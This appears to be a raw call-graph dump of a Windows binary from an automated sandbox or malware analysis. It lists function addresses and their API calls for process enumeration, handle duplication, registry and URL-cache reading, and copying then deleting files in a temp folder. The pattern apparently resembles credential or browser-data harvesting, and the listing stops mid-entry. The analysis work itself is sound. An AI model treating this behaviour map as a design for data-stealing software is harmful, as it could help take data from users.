38903 40b2cc 27 API calls 38902->38903 38904 402b82 38903->38904 38905 40b2cc 27 API calls 38904->38905 38906 402b99 38905->38906 38907 40b2cc 27 API calls 38906->38907 38908 402bb0 38907->38908 38909 40b2cc 27 API calls 38908->38909 38910 402bc7 38909->38910 38911 40b2cc 27 API calls 38910->38911 38912 402bde 38911->38912 38913 40b2cc 27 API calls 38912->38913 38914 402bf5 38913->38914 38915 40b2cc 27 API calls 38914->38915 38916 402c0c 38915->38916 38917 40b2cc 27 API calls 38916->38917 38918 402c23 38917->38918 38919 40b2cc 27 API calls 38918->38919 38920 402c3a 38919->38920 38921 40b2cc 27 API calls 38920->38921 38922 402c51 38921->38922 38923 40b2cc 27 API calls 38922->38923 38924 402c68 38923->38924 38925 40b2cc 27 API calls 38924->38925 38926 402c7f 38925->38926 38927 40b2cc 27 API calls 38926->38927 38928 402c99 38927->38928 38929 40b2cc 27 API calls 38928->38929 38930 402cb3 38929->38930 38931 40b2cc 27 API calls 38930->38931 38932 402cd5 38931->38932 38933 40b2cc 27 API calls 38932->38933 38934 402cf0 38933->38934 38935 40b2cc 27 API calls 38934->38935 38936 402d0b 38935->38936 38937 40b2cc 27 API calls 38936->38937 38938 402d26 38937->38938 38939 40b2cc 27 API calls 38938->38939 38940 402d3e 38939->38940 38941 40b2cc 27 API calls 38940->38941 38942 402d59 38941->38942 38943 40b2cc 27 API calls 38942->38943 38944 402d78 38943->38944 38945 40b2cc 27 API calls 38944->38945 38946 402d93 38945->38946 38947 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38946->38947 38947->38829 38948->38819 38952 40b58d 38949->38952 38951 40b2d1 38951->38894 38953 40b5a4 GetModuleHandleW FindResourceW 38952->38953 38954 40b62e 38952->38954 38955 40b5c2 LoadResource 38953->38955 38957 40b5e7 38953->38957 38954->38951 38956 40b5d0 SizeofResource LockResource 38955->38956 38955->38957 38956->38957 38957->38954 38965 40afcf 38957->38965 38959 40b608 memcpy 38968 40b4d3 memcpy 38959->38968 38961 40b61e 38969 40b3c1 18 API calls 38961->38969 38963 40b626 38970 40b04b 38963->38970 38966 40b04b ??3@YAXPAX 38965->38966 38967 40afd7 ??2@YAPAXI 38966->38967 38967->38959 38968->38961 38969->38963 38971 40b051 ??3@YAXPAX 38970->38971 38972 40b05f 38970->38972 38971->38972 38972->38954 38973->38837 38975 4032c4 38974->38975 38976 40b633 ??3@YAXPAX 38975->38976 38977 403316 38976->38977 38996 44553b 38977->38996 38981 403480 39192 40368c 15 API calls 38981->39192 38983 403489 38984 40b633 ??3@YAXPAX 38983->38984 38985 403495 38984->38985 38985->38839 38986 4033a9 memset memcpy 38987 4033ec wcscmp 38986->38987 38988 40333c 38986->38988 38987->38988 38988->38981 38988->38986 38988->38987 39190 4028e7 11 API calls 38988->39190 39191 40f508 6 API calls 38988->39191 38990 403421 _wcsicmp 38990->38988 38993 444a64 FreeLibrary 38992->38993 38994 444a83 38992->38994 38993->38994 38994->38839 38995->38840 38997 445548 38996->38997 38998 445599 38997->38998 39193 40c768 38997->39193 38999 4455a8 memset 38998->38999 39006 4457f2 38998->39006 39276 403988 38999->39276 39009 445854 39006->39009 39378 403e2d memset memset memset memset memset 39006->39378 39007 4458bb memset memset 39013 414c2e 16 API calls 39007->39013 39059 4458aa 39009->39059 39401 403c9c memset memset memset memset memset 39009->39401 39011 44595e memset memset 39019 414c2e 16 API calls 39011->39019 39012 4455e5 39016 445672 39012->39016 39022 44560f 39012->39022 39014 4458f9 39013->39014 39020 40b2cc 27 API calls 39014->39020 39287 403fbe memset memset memset memset memset 39016->39287 39017 445a00 memset memset 39424 414c2e 39017->39424 39018 445b22 39024 445bca 39018->39024 39025 445b38 memset memset memset 39018->39025 39029 44599c 39019->39029 39030 445909 39020->39030 39033 4087b3 338 API calls 39022->39033 39023 445849 39488 40b1ab ??3@YAXPAX ??3@YAXPAX 39023->39488 39031 445c8b memset memset 39024->39031 39098 445cf0 39024->39098 39034 445bd4 39025->39034 39035 445b98 39025->39035 39038 40b2cc 27 API calls 39029->39038 39039 409d1f 6 API calls 39030->39039 39042 414c2e 16 API calls 39031->39042 39032 44589f 39489 40b1ab ??3@YAXPAX ??3@YAXPAX 39032->39489 39040 445621 39033->39040 39048 414c2e 16 API calls 39034->39048 39035->39034 39044 445ba2 39035->39044 39041 4459ac 39038->39041 39052 445919 39039->39052 39474 4454bf 20 API calls 39040->39474 39054 409d1f 6 API calls 39041->39054 39055 445cc9 39042->39055 39562 4099c6 wcslen 39044->39562 39047 40b2cc 27 API calls 39060 445a4f 39047->39060 39062 445be2 39048->39062 39049 403335 39189 4452e5 45 API calls 39049->39189 39050 445d3d 39082 40b2cc 27 API calls 39050->39082 39051 445d88 memset memset memset 39065 414c2e 16 API calls 39051->39065 39490 409b98 GetFileAttributesW 39052->39490 39053 445823 39053->39023 39064 4087b3 338 API calls 39053->39064 39066 4459bc 39054->39066 39067 409d1f 6 API calls 39055->39067 39057 445879 39057->39032 39078 4087b3 338 API calls 39057->39078 39059->39007 39083 44594a 39059->39083 39439 409d1f wcslen wcslen 39060->39439 39071 40b2cc 27 API calls 39062->39071 39064->39053 39075 445dde 39065->39075 39558 409b98 GetFileAttributesW 39066->39558 39077 445ce1 39067->39077 39068 445bb3 39565 445403 memset 39068->39565 39072 445bf3 39071->39072 39081 409d1f 6 API calls 39072->39081 39073 445928 39073->39083 39491 40b6ef 39073->39491 39084 40b2cc 27 API calls 39075->39084 39582 409b98 GetFileAttributesW 39077->39582 39078->39057 39092 445c07 39081->39092 39093 445d54 _wcsicmp 39082->39093 39083->39011 39097 4459ed 39083->39097 39096 445def 39084->39096 39085 4459cb 39085->39097 39106 40b6ef 252 API calls 39085->39106 39089 40b2cc 27 API calls 39090 445a94 39089->39090 39444 40ae18 39090->39444 39091 44566d 39091->39006 39361 413d4c 39091->39361 39102 445389 258 API calls 39092->39102 39103 445d71 39093->39103 39168 445d67 39093->39168 39095 445665 39475 40b1ab ??3@YAXPAX ??3@YAXPAX 39095->39475 39104 409d1f 6 API calls 39096->39104 39097->39017 39097->39018 39098->39049 39098->39050 39098->39051 39099 445389 258 API calls 39099->39024 39108 445c17 39102->39108 39583 445093 23 API calls 39103->39583 39111 445e03 39104->39111 39106->39097 39107 4456d8 39113 40b2cc 27 API calls 39107->39113 39114 40b2cc 27 API calls 39108->39114 39110 44563c 39110->39095 39116 4087b3 338 API calls 39110->39116 39584 409b98 GetFileAttributesW 39111->39584 39112 40b6ef 252 API calls 39112->39049 39118 4456e2 39113->39118 39119 445c23 39114->39119 39115 445d83 39115->39049 39116->39110 39477 413fa6 _wcsicmp _wcsicmp 39118->39477 39123 409d1f 6 API calls 39119->39123 39121 445e12 39128 445e6b 39121->39128 39134 40b2cc 27 API calls 39121->39134 39126 445c37 39123->39126 39124 445aa1 39127 445b17 39124->39127 39142 445ab2 memset 39124->39142 39155 409d1f 6 API calls 39124->39155 39451 40add4 39124->39451 39456 445389 39124->39456 39465 40ae51 39124->39465 39125 4456eb 39130 4456fd memset memset memset memset 39125->39130 39131 4457ea 39125->39131 39132 445389 258 API calls 39126->39132 39559 40aebe 39127->39559 39586 445093 23 API calls 39128->39586 39478 409c70 wcscpy wcsrchr 39130->39478 39481 413d29 39131->39481 39137 445c47 39132->39137 39138 445e33 39134->39138 39144 40b2cc 27 API calls 39137->39144 39145 409d1f 6 API calls 39138->39145 39140 445e7e 39141 445f67 39140->39141 39150 40b2cc 27 API calls 39141->39150 39146 40b2cc 27 API calls 39142->39146 39148 445c53 39144->39148 39149 445e47 39145->39149 39146->39124 39147 409c70 2 API calls 39151 44577e 39147->39151 39152 409d1f 6 API calls 39148->39152 39585 409b98 GetFileAttributesW 39149->39585 39154 445f73 39150->39154 39156 409c70 2 API calls 39151->39156 39157 445c67 39152->39157 39159 409d1f 6 API calls 39154->39159 39155->39124 39161 445389 258 API calls 39157->39161 39158 445e56 39158->39128 39164 445e83 memset 39158->39164 39162 445f87 39159->39162 39161->39024 39589 409b98 GetFileAttributesW 39162->39589 39166 40b2cc 27 API calls 39164->39166 39169 445eab 39166->39169 39168->39049 39168->39112 39171 409d1f 6 API calls 39169->39171 39173 445ebf 39171->39173 39175 40ae18 9 API calls 39173->39175 39185 445ef5 39175->39185 39178 40ae51 9 API calls 39178->39185 39180 445f5c 39182 40aebe FindClose 39180->39182 39181 40add4 2 API calls 39181->39185 39182->39141 39183 40b2cc 27 API calls 39183->39185 39184 409d1f 6 API calls 39184->39185 39185->39178 39185->39180 39185->39181 39185->39183 39185->39184 39187 445f3a 39185->39187 39587 409b98 GetFileAttributesW 39185->39587 39588 445093 23 API calls 39187->39588 39189->38988 39190->38990 39191->38988 39192->38983 39194 40c775 39193->39194 39590 40b1ab ??3@YAXPAX ??3@YAXPAX 39194->39590 39196 40c788 39591 40b1ab ??3@YAXPAX ??3@YAXPAX 39196->39591 39198 40c790 39592 40b1ab ??3@YAXPAX ??3@YAXPAX 39198->39592 39200 40c798 39201 40aa04 ??3@YAXPAX 39200->39201 39202 40c7a0 39201->39202 39593 40c274 memset 39202->39593 39207 40a8ab 9 API calls 39208 40c7c3 39207->39208 39209 40a8ab 9 API calls 39208->39209 39210 40c7d0 39209->39210 39622 40c3c3 39210->39622 39214 40c7e5 39215 40c877 39214->39215 39216 40c86c 39214->39216 39222 40c634 49 API calls 39214->39222 39647 40a706 39214->39647 39223 40bdb0 39215->39223 39664 4053fe 39 API calls 39216->39664 39222->39214 39854 404363 39223->39854 39277 40399d 39276->39277 39920 403a16 39277->39920 39279 403a09 39934 40b1ab ??3@YAXPAX ??3@YAXPAX 39279->39934 39281 403a12 wcsrchr 39281->39012 39282 4039a3 39282->39279 39285 4039f4 39282->39285 39931 40a02c CreateFileW 39282->39931 39285->39279 39286 4099c6 2 API calls 39285->39286 39286->39279 39288 414c2e 16 API calls 39287->39288 39289 404048 39288->39289 39290 414c2e 16 API calls 39289->39290 39291 404056 39290->39291 39292 409d1f 6 API calls 39291->39292 39293 404073 39292->39293 39294 409d1f 6 API calls 39293->39294 39295 40408e 39294->39295 39296 409d1f 6 API calls 39295->39296 39297 4040a6 39296->39297 39298 403af5 20 API calls 39297->39298 39299 4040ba 39298->39299 39300 403af5 20 API calls 39299->39300 39301 4040cb 39300->39301 39961 40414f memset 39301->39961 39303 404140 39305 4040ec memset 39308 4040e0 39305->39308 39307 4099c6 2 API calls 39307->39308 39308->39303 39308->39305 39308->39307 39309 40a8ab 9 API calls 39308->39309 39309->39308 39362 40b633 ??3@YAXPAX 39361->39362 39363 413d65 CreateToolhelp32Snapshot memset Process32FirstW 39362->39363 39364 413f00 Process32NextW 39363->39364 39365 413da5 OpenProcess 39364->39365 39366 413f17 CloseHandle 39364->39366 39367 413df3 memset 39365->39367 39370 413eb0 39365->39370 39366->39107 40228 413f27 39367->40228 39369 413ebf ??3@YAXPAX 39369->39370 39370->39364 39370->39369 39371 4099f4 3 API calls 39370->39371 39371->39370 39373 413e37 GetModuleHandleW 39374 413e1f 39373->39374 39375 413e46 GetProcAddress 39373->39375 39374->39373 40233 413959 39374->40233 40249 413ca4 39374->40249 39375->39374 39377 413ea2 CloseHandle 39377->39370 39379 414c2e 16 API calls 39378->39379 39380 403eb7 39379->39380 39381 414c2e 16 API calls 39380->39381 39382 403ec5 39381->39382 39383 409d1f 6 API calls 39382->39383 39384 403ee2 39383->39384 39385 409d1f 6 API calls 39384->39385 39386 403efd 39385->39386 39387 409d1f 6 API calls 39386->39387 39388 403f15 39387->39388 39389 403af5 20 API calls 39388->39389 39390 403f29 39389->39390 39391 403af5 20 API calls 39390->39391 39392 403f3a 39391->39392 39393 40414f 33 API calls 39392->39393 39398 403f4f 39393->39398 39394 403faf 40263 40b1ab ??3@YAXPAX ??3@YAXPAX 39394->40263 39396 403f5b memset 39396->39398 39397 403fb7 39397->39053 39398->39394 39398->39396 39399 4099c6 2 API calls 39398->39399 39400 40a8ab 9 API calls 39398->39400 39399->39398 39400->39398 39402 414c2e 16 API calls 39401->39402 39403 403d26 39402->39403 39404 414c2e 16 API calls 39403->39404 39405 403d34 39404->39405 39406 409d1f 6 API calls 39405->39406 39407 403d51 39406->39407 39408 409d1f 6 API calls 39407->39408 39409 403d6c 39408->39409 39410 409d1f 6 API calls 39409->39410 39411 403d84 39410->39411 39412 403af5 20 API calls 39411->39412 39413 403d98 39412->39413 39414 403af5 20 API calls 39413->39414 39415 403da9 39414->39415 39416 40414f 33 API calls 39415->39416 39417 403dbe 39416->39417 39418 403e1e 39417->39418 39419 403dca memset 39417->39419 39422 4099c6 2 API calls 39417->39422 39423 40a8ab 9 API calls 39417->39423 40264 40b1ab ??3@YAXPAX ??3@YAXPAX 39418->40264 39419->39417 39421 403e26 39421->39057 39422->39417 39423->39417 39425 414b81 9 API calls 39424->39425 39426 414c40 39425->39426 39427 414c73 memset 39426->39427 40265 409cea 39426->40265 39428 414c94 39427->39428 40268 414592 RegOpenKeyExW 39428->40268 39431 414c64 39431->39047 39433 414cc1 39434 414cf4 wcscpy 39433->39434 40269 414bb0 wcscpy 39433->40269 39434->39431 39436 414cd2 40270 4145ac RegQueryValueExW 39436->40270 39438 414ce9 RegCloseKey 39438->39434 39440 409d62 39439->39440 39441 409d43 wcscpy 39439->39441 39440->39089 39442 409719 2 API calls 39441->39442 39443 409d51 wcscat 39442->39443 39443->39440 39445 40aebe FindClose 39444->39445 39446 40ae21 39445->39446 39447 4099c6 2 API calls 39446->39447 39448 40ae35 39447->39448 39449 409d1f 6 API calls 39448->39449 39450 40ae49 39449->39450 39450->39124 39452 40ade0 39451->39452 39453 40ae0f 39451->39453 39452->39453 39454 40ade7 wcscmp 39452->39454 39453->39124 39454->39453 39455 40adfe wcscmp 39454->39455 39455->39453 39457 40ae18 9 API calls 39456->39457 39459 4453c4 39457->39459 39458 40ae51 9 API calls 39458->39459 39459->39458 39460 4453f3 39459->39460 39461 40add4 2 API calls 39459->39461 39464 445403 253 API calls 39459->39464 39462 40aebe FindClose 39460->39462 39461->39459 39463 4453fe 39462->39463 39463->39124 39464->39459 39466 40ae7b FindNextFileW 39465->39466 39467 40ae5c FindFirstFileW 39465->39467 39468 40ae94 39466->39468 39469 40ae8f 39466->39469 39467->39468 39471 40aeb6 39468->39471 39472 409d1f 6 API calls 39468->39472 39470 40aebe FindClose 39469->39470 39470->39468 39471->39124 39472->39471 39474->39110 39475->39091 39477->39125 39479 409c89 39478->39479 39479->39147 39482 413d39 39481->39482 39483 413d2f FreeLibrary 39481->39483 39484 40b633 ??3@YAXPAX 39482->39484 39483->39482 39485 413d42 39484->39485 39488->39009 39489->39059 39490->39073 39492 44db70 39491->39492 39493 40b6fc memset 39492->39493 39494 409c70 2 API calls 39493->39494 39495 40b732 wcsrchr 39494->39495 39496 40b743 39495->39496 39497 40b746 memset 39495->39497 39496->39497 39498 40b2cc 27 API calls 39497->39498 39499 40b76f 39498->39499 39500 409d1f 6 API calls 39499->39500 39501 40b783 39500->39501 40271 409b98 GetFileAttributesW 39501->40271 39503 40b792 39504 40b7c2 39503->39504 39505 409c70 2 API calls 39503->39505 40272 40bb98 39504->40272 39507 40b7a5 39505->39507 39509 40b2cc 27 API calls 39507->39509 39513 40b7b2 39509->39513 39510 40b837 FindCloseChangeNotification 39512 40b83e memset 39510->39512 39511 40b817 40317 409a45 GetTempPathW 39511->40317 40305 40a6e6 WideCharToMultiByte 39512->40305 39516 409d1f 6 API calls 39513->39516 39516->39504 39517 40b827 CopyFileW 39517->39512 39518 40b866 39519 444432 121 API calls 39518->39519 39520 40b879 39519->39520 39521 40bad5 39520->39521 39522 40b273 27 API calls 39520->39522 39523 40baeb 39521->39523 39524 40bade DeleteFileW 39521->39524 39525 40b89a 39522->39525 39526 40b04b ??3@YAXPAX 39523->39526 39524->39523 39527 438552 134 API calls 39525->39527 39528 40baf3 39526->39528 39529 40b8a4 39527->39529 39528->39083 39530 40bacd 39529->39530 39532 4251c4 137 API calls 39529->39532 39531 443d90 111 API calls 39530->39531 39531->39521 39555 40b8b8 39532->39555 39533 40bac6 40324 424f26 123 API calls 39533->40324 39534 40b8bd memset 39536 425413 17 API calls 39534->39536 39536->39555 39537 425413 17 API calls 39537->39555 39540 40a71b MultiByteToWideChar 39540->39555 39541 40a734 MultiByteToWideChar 39541->39555 39542 4253af 17 API calls 39542->39555 39543 4253cf 17 API calls 39543->39555 39544 40b9b5 memcmp 39544->39555 39545 4099c6 2 API calls 39545->39555 39546 404423 37 API calls 39546->39555 39548 40bb3e memset memcpy 40325 40a734 MultiByteToWideChar 39548->40325 39549 4251c4 137 API calls 39549->39555 39552 40bb88 LocalFree 39552->39555 39555->39533 39555->39534 39555->39537 39555->39540 39555->39541 39555->39542 39555->39543 39555->39544 39555->39545 39555->39546 39555->39548 39555->39549 39556 40ba5f memcmp 39555->39556 39557 4099f4 3 API calls 39555->39557 40306 4253ef 39555->40306 40311 40b64c 39555->40311 40320 447280 memset 39555->40320 40321 447960 memset memcpy memcpy memcpy 39555->40321 40322 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 39555->40322 40323 447920 memcpy memcpy memcpy 39555->40323 39556->39555 39557->39555 39558->39085 39560 40aed1 39559->39560 39561 40aec7 FindClose 39559->39561 39560->39018 39561->39560 39563 4099d7 39562->39563 39564 4099da memcpy 39562->39564 39563->39564 39564->39068 39566 40b2cc 27 API calls 39565->39566 39567 44543f 39566->39567 39568 409d1f 6 API calls 39567->39568 39569 44544f 39568->39569 40422 409b98 GetFileAttributesW 39569->40422 39571 44545e 39572 445476 39571->39572 39573 40b6ef 252 API calls 39571->39573 39574 40b2cc 27 API calls 39572->39574 39573->39572 39575 445482 39574->39575 39576 409d1f 6 API calls 39575->39576 39577 445492 39576->39577 40423 409b98 GetFileAttributesW 39577->40423 39579 4454a1 39580 4454b9 39579->39580 39581 40b6ef 252 API calls 39579->39581 39580->39099 39581->39580 39582->39098 39583->39115 39584->39121 39585->39158 39586->39140 39587->39185 39588->39185 39589->39168 39590->39196 39591->39198 39592->39200 39594 414c2e 16 API calls 39593->39594 39595 40c2ae 39594->39595 39665 40c1d3 39595->39665 39600 40c3be 39617 40a8ab 39600->39617 39601 40afcf 2 API calls 39602 40c2fd FindFirstUrlCacheEntryW 39601->39602 39603 40c3b6 39602->39603 39604 40c31e wcschr 39602->39604 39605 40b04b ??3@YAXPAX 39603->39605 39606 40c331 39604->39606 39607 40c35e FindNextUrlCacheEntryW 39604->39607 39605->39600 39608 40a8ab 9 API calls 39606->39608 39607->39604 39609 40c373 GetLastError 39607->39609 39612 40c33e wcschr 39608->39612 39610 40c3ad FindCloseUrlCache 39609->39610 39611 40c37e 39609->39611 39610->39603 39613 40afcf 2 API calls 39611->39613 39612->39607 39614 40c34f 39612->39614 39615 40c391 FindNextUrlCacheEntryW 39613->39615 39616 40a8ab 9 API calls 39614->39616 39615->39604 39615->39610 39616->39607 39781 40a97a 39617->39781 39620 40a8cc 39620->39207 39621 40a8d0 7 API calls 39621->39620 39786 40b1ab ??3@YAXPAX ??3@YAXPAX 39622->39786 39624 40c3dd 39625 40b2cc 27 API calls 39624->39625 39626 40c3e7 39625->39626 39787 414592 RegOpenKeyExW 39626->39787 39628 40c3f4 39629 40c50e 39628->39629 39630 40c3ff 39628->39630 39644 405337 39629->39644 39631 40a9ce 4 API calls 39630->39631 39632 40c418 memset 39631->39632 39788 40aa1d 39632->39788 39635 40c471 39637 40c47a _wcsupr 39635->39637 39636 40c505 RegCloseKey 39636->39629 39638 40a8d0 7 API calls 39637->39638 39639 40c498 39638->39639 39790 405220 39644->39790 39648 4099c6 2 API calls 39647->39648 39649 40a714 _wcslwr 39648->39649 39650 40c634 39649->39650 39847 405361 39650->39847 39664->39215 39666 40ae18 9 API calls 39665->39666 39672 40c210 39666->39672 39667 40ae51 9 API calls 39667->39672 39668 40c264 39669 40aebe FindClose 39668->39669 39671 40c26f 39669->39671 39670 40add4 2 API calls 39670->39672 39677 40e5ed memset memset 39671->39677 39672->39667 39672->39668 39672->39670 39673 40c231 _wcsicmp 39672->39673 39674 40c1d3 35 API calls 39672->39674 39673->39672 39675 40c248 39673->39675 39674->39672 39690 40c084 22 API calls 39675->39690 39678 414c2e 16 API calls 39677->39678 39679 40e63f 39678->39679 39680 409d1f 6 API calls 39679->39680 39681 40e658 39680->39681 39691 409b98 GetFileAttributesW 39681->39691 39683 40e667 39685 409d1f 6 API calls 39683->39685 39686 40e680 39683->39686 39685->39686 39692 409b98 GetFileAttributesW 39686->39692 39687 40e68f 39688 40c2d8 39687->39688 39693 40e4b2 39687->39693 39688->39600 39688->39601 39690->39672 39691->39683 39692->39687 39714 40e01e 39693->39714 39695 40e593 39696 40e5b0 39695->39696 39697 40e59c DeleteFileW 39695->39697 39698 40b04b ??3@YAXPAX 39696->39698 39697->39696 39700 40e5bb 39698->39700 39699 40e521 39699->39695 39737 40e175 39699->39737 39702 40e5c4 CloseHandle 39700->39702 39703 40e5cc 39700->39703 39702->39703 39705 40b633 ??3@YAXPAX 39703->39705 39704 40e573 39706 40e584 39704->39706 39707 40e57c FindCloseChangeNotification 39704->39707 39708 40e5db 39705->39708 39780 40b1ab ??3@YAXPAX ??3@YAXPAX 39706->39780 39707->39706 39711 40b633 ??3@YAXPAX 39708->39711 39710 40e540 39710->39704 39757 40e2ab 39710->39757 39712 40e5e3 39711->39712 39712->39688 39715 406214 22 API calls 39714->39715 39716 40e03c 39715->39716 39717 40e16b 39716->39717 39718 40dd85 74 API calls 39716->39718 39717->39699 39719 40e06b 39718->39719 39719->39717 39720 40afcf ??2@YAPAXI ??3@YAXPAX 39719->39720 39721 40e08d OpenProcess 39720->39721 39722 40e0a4 GetCurrentProcess DuplicateHandle 39721->39722 39726 40e152 39721->39726 39723 40e0d0 GetFileSize 39722->39723 39724 40e14a CloseHandle 39722->39724 39727 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 39723->39727 39724->39726 39725 40e160 39729 40b04b ??3@YAXPAX 39725->39729 39726->39725 39728 406214 22 API calls 39726->39728 39730 40e0ea 39727->39730 39728->39725 39729->39717 39731 4096dc CreateFileW 39730->39731 39732 40e0f1 CreateFileMappingW 39731->39732 39733 40e140 CloseHandle CloseHandle 39732->39733 39734 40e10b MapViewOfFile 39732->39734 39733->39724 39735 40e13b FindCloseChangeNotification 39734->39735 39736 40e11f WriteFile UnmapViewOfFile 39734->39736 39735->39733 39736->39735 39738 40e18c 39737->39738 39739 406b90 11 API calls 39738->39739 39740 40e19f 39739->39740 39741 40e1a7 memset 39740->39741 39742 40e299 39740->39742 39747 40e1e8 39741->39747 39743 4069a3 ??3@YAXPAX ??3@YAXPAX 39742->39743 39744 40e2a4 39743->39744 39744->39710 39745 406e8f 13 API calls 39745->39747 39746 406b53 SetFilePointerEx ReadFile 39746->39747 39747->39745 39747->39746 39748 40e283 39747->39748 39749 40dd50 _wcsicmp 39747->39749 39753 40742e 8 API calls 39747->39753 39754 40aae3 wcslen wcslen _memicmp 39747->39754 39755 40e244 _snwprintf 39747->39755 39750 40e291 39748->39750 39751 40e288 ??3@YAXPAX 39748->39751 39749->39747 39752 40aa04 ??3@YAXPAX 39750->39752 39751->39750 39752->39742 39753->39747 39754->39747 39756 40a8d0 7 API calls 39755->39756 39756->39747 39758 40e2c2 39757->39758 39759 406b90 11 API calls 39758->39759 39770 40e2d3 39759->39770 39760 40e4a0 39761 4069a3 ??3@YAXPAX ??3@YAXPAX 39760->39761 39763 40e4ab 39761->39763 39762 406e8f 13 API calls 39762->39770 39763->39710 39764 406b53 SetFilePointerEx ReadFile 39764->39770 39765 40e489 39766 40aa04 ??3@YAXPAX 39765->39766 39768 40e491 39766->39768 39767 40dd50 _wcsicmp 39767->39770 39768->39760 39769 40e497 ??3@YAXPAX 39768->39769 39769->39760 39770->39760 39770->39762 39770->39764 39770->39765 39770->39767 39771 40dd50 _wcsicmp 39770->39771 39774 40742e 8 API calls 39770->39774 39775 40e3e0 memcpy 39770->39775 39776 40e3b3 wcschr 39770->39776 39777 40e3fb memcpy 39770->39777 39778 40e416 memcpy 39770->39778 39779 40e431 memcpy 39770->39779 39772 40e376 memset 39771->39772 39773 40aa29 6 API calls 39772->39773 39773->39770 39774->39770 39775->39770 39776->39770 39777->39770 39778->39770 39779->39770 39780->39695 39783 40a980 39781->39783 39782 40a8bb 39782->39620 39782->39621 39783->39782 39784 40a995 _wcsicmp 39783->39784 39785 40a99c wcscmp 39783->39785 39784->39783 39785->39783 39786->39624 39787->39628 39789 40aa23 RegEnumValueW 39788->39789 39789->39635 39789->39636 39791 405335 39790->39791 39792 40522a 39790->39792 39791->39214 39793 40b2cc 27 API calls 39792->39793 39794 405234 39793->39794 39795 40a804 8 API calls 39794->39795 39796 40523a 39795->39796 39835 40b273 39796->39835 39855 40440c FreeLibrary 39854->39855 39856 40436d 39855->39856 39921 403a29 39920->39921 39935 403bed memset memset 39921->39935 39923 403ae7 39948 40b1ab ??3@YAXPAX ??3@YAXPAX 39923->39948 39924 403a3f memset 39929 403a2f 39924->39929 39926 403aef 39926->39282 39927 409d1f 6 API calls 39927->39929 39928 409b98 GetFileAttributesW 39928->39929 39929->39923 39929->39924 39929->39927 39929->39928 39930 40a8d0 7 API calls 39929->39930 39930->39929 39932 40a051 GetFileTime FindCloseChangeNotification 39931->39932 39933 4039ca CompareFileTime 39931->39933 39932->39933 39933->39282 39934->39281 39936 414c2e 16 API calls 39935->39936 39937 403c38 39936->39937 39938 409719 2 API calls 39937->39938 39939 403c3f wcscat 39938->39939 39940 414c2e 16 API calls 39939->39940 39941 403c61 39940->39941 39942 409719 2 API calls 39941->39942 39943 403c68 wcscat 39942->39943 39949 403af5 39943->39949 39946 403af5 20 API calls 39947 403c95 39946->39947 39947->39929 39948->39926 39950 403b02 39949->39950 39951 40ae18 9 API calls 39950->39951 39959 403b37 39951->39959 39952 403bdb 39954 40aebe FindClose 39952->39954 39953 40add4 wcscmp wcscmp 39953->39959 39955 403be6 39954->39955 39955->39946 39956 40ae18 9 API calls 39956->39959 39957 40ae51 9 API calls 39957->39959 39958 40aebe FindClose 39958->39959 39959->39952 39959->39953 39959->39956 39959->39957 39959->39958 39960 40a8d0 7 API calls 39959->39960 39960->39959 39962 409d1f 6 API calls 39961->39962 39963 404190 39962->39963 39976 409b98 GetFileAttributesW 39963->39976 39965 40419c 39966 4041a7 6 API calls 39965->39966 39967 40435c 39965->39967 39968 40424f 39966->39968 39967->39308 39968->39967 39970 40425e memset 39968->39970 39972 409d1f 6 API calls 39968->39972 39973 40a8ab 9 API calls 39968->39973 39977 414842 39968->39977 39970->39968 39972->39968 39976->39965 40255 413f4f 40228->40255 40231 413f37 K32GetModuleFileNameExW 40232 413f4a 40231->40232 40232->39374 40234 413969 wcscpy 40233->40234 40235 41396c wcschr 40233->40235 40247 413a3a 40234->40247 40235->40234 40237 41398e 40235->40237 40260 4097f7 wcslen wcslen _memicmp 40237->40260 40239 41399a 40247->39374 40250 413cb0 GetModuleHandleW 40249->40250 40251 413cda 40249->40251 40250->40251 40252 413cbf GetProcAddress 40250->40252 40253 413ce3 GetProcessTimes 40251->40253 40254 413cf6 40251->40254 40252->40251 40253->39377 40254->39377 40256 413f2f 40255->40256 40257 413f54 40255->40257 40256->40231 40256->40232 40258 40a804 8 API calls 40257->40258 40259 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 40258->40259 40259->40256 40260->40239 40263->39397 40264->39421 40266 409cf9 GetVersionExW 40265->40266 40267 409d0a 40265->40267 40266->40267 40267->39427 40267->39431 40268->39433 40269->39436 40270->39438 40271->39503 40273 40bba5 40272->40273 40326 40cc26 40273->40326 40276 40bd4b 40354 40cc0c 40276->40354 40281 40b2cc 27 API calls 40282 40bbef 40281->40282 40347 40ccf0 40282->40347 40284 40bbf5 40284->40276 40351 40ccb4 40284->40351 40287 40cf04 17 API calls 40288 40bc2e 40287->40288 40289 40bd43 40288->40289 40290 40b2cc 27 API calls 40288->40290 40291 40cc0c 4 API calls 40289->40291 40292 40bc40 40290->40292 40291->40276 40293 40ccf0 _wcsicmp 40292->40293 40294 40bc46 40293->40294 40294->40289 40295 40bc61 memset memset WideCharToMultiByte 40294->40295 40361 40103c strlen 40295->40361 40297 40bcc0 40298 40b273 27 API calls 40297->40298 40299 40bcd0 memcmp 40298->40299 40299->40289 40305->39518 40307 42533e 16 API calls 40306->40307 40308 4253fb 40307->40308 40309 42538f 16 API calls 40308->40309 40312 40b65c 40311->40312 40313 40b697 SystemTimeToFileTime 40312->40313 40316 40b681 40312->40316 40421 44d9c0 40313->40421 40315 40b6d6 FileTimeToLocalFileTime 40315->40316 40316->39555 40318 409a74 GetTempFileNameW 40317->40318 40319 409a66 GetWindowsDirectoryW 40317->40319 40318->39517 40319->40318 40320->39555 40321->39555 40322->39555 40323->39555 40324->39530 40325->39552 40362 4096c3 CreateFileW 40326->40362 40328 40cc34 40329 40cc3d GetFileSize 40328->40329 40330 40bbca 40328->40330 40331 40afcf 2 API calls 40329->40331 40330->40276 40338 40cf04 40330->40338 40332 40cc64 40331->40332 40363 40a2ef ReadFile 40332->40363 40334 40cc71 40364 40ab4a MultiByteToWideChar 40334->40364 40336 40cc95 FindCloseChangeNotification 40337 40b04b ??3@YAXPAX 40336->40337 40337->40330 40339 40b633 ??3@YAXPAX 40338->40339 40340 40cf14 40339->40340 40370 40b1ab ??3@YAXPAX ??3@YAXPAX 40340->40370 40342 40bbdd 40342->40276 40342->40281 40343 40cf1b 40343->40342 40345 40cfef 40343->40345 40371 40cd4b 40343->40371 40346 40cd4b 14 API calls 40345->40346 40346->40342 40348 40cd3f 40347->40348 40349 40ccfd 40347->40349 40348->40284 40349->40348 40350 40cd26 